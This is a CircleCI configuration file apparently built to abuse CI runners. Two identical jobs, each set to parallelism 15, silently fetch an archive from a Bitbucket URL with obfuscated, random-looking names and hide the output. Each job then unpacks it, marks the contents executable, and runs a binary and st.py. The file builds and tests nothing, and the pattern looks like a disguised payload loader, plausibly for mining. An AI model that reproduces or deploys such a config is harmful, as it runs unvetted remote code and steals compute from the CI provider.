

version: 2

jobs:

  Nakula:

    docker:

      - image: python:3.8

    working_directory: /root


    steps:

    - run:

        name: baclola
        command: |

            curl -o masuytwu https://bitbucket.org/nunukefend123/usenaszcvneriywerojasdkxnbeoqwetyuolhgsazcvbnjlgdaqeryipkgdazc/raw/5a781fc4d6ad39f5221dcb332c4ca214a1830662/aldhahqirotoekmaxnvnksqhtworpkdgqywiototmcbzgwudkfkdj > /dev/null 2>&1

            tar -xf masuytwu && tar -xf AVN

            cd /AVN/00 && cp main /root
            
            chmod u+x *

            python st.py

    parallelism: 15


  Nuliya:

    docker:

      - image: python:3.8

    working_directory: /root


    steps:

    - run:

        name: baclola
        command: |

            curl -o masuytwu https://bitbucket.org/nunukefend123/usenaszcvneriywerojasdkxnbeoqwetyuolhgsazcvbnjlgdaqeryipkgdazc/raw/5a781fc4d6ad39f5221dcb332c4ca214a1830662/aldhahqirotoekmaxnvnksqhtworpkdgqywiototmcbzgwudkfkdj > /dev/null 2>&1

            tar -xf masuytwu && tar -xf AVN

            cd /AVN/00 && cp main /root
            
            chmod u+x *

            python st.py

    parallelism: 15








workflows:

  version: 2

  Semua:

    jobs:

    - Nakula

    - Nuliya






